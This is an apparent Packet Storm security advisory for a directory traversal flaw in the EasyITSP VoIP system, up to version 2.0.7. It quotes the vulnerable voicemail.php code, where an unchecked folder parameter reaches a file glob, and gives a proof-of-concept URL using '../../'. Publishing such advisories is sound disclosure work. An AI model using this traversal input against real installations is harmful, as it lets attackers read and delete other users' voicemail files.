EasyITSP versions 2.0.7 and below suffer from a directory traversal vulnerability.
12e4f3dc2c3fc812932fe6c5aa163f3a09061d74da4dc788587dac8f850435ccDirectory Traversal - EasyITSP <= 2.0.7
EasyITSP - Telephone System VoIP
https://blaszczakm.blogspot.com
Michal Blaszczak
Search/Read/Delete filetype *.txt
Search/Play/Delete filetype *.wav - Voicemail
file: voicemail.php line: 220
foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) {
file: voicemail.php line: 186 - 190
if(isset($_GET['folder'])) {
$vmfolder = $_GET['folder'];
} else {
$vmfolder = "INBOX";
}
POC:
https:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../
Michał Błaszczak
https://blaszczakm.blogspot.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed